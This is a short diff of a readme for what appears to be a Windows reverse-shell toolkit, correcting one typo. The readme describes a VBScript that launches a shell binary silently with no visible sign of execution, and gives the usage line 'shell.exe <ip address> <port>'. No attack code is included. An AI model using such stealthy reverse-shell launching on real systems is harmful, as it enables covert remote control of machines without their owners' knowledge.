infoskirmish/Window-Tools/Simple Reverse Shell/readme.txt

 run.vbs -> A proof of concept Visual Basic Script that shows you how to launch shell.exe with no windows popping up and no OBVIOUS indication anything was executed.

-    caveat: you will need to edit run.vbs to reflect the ip address and port you server will be using.
+    caveat: you will need to edit run.vbs to reflect the ip address and port your server will be using.

 shell.exe -> The binary bread and butter.
              use: shell.exe <ip address> <port>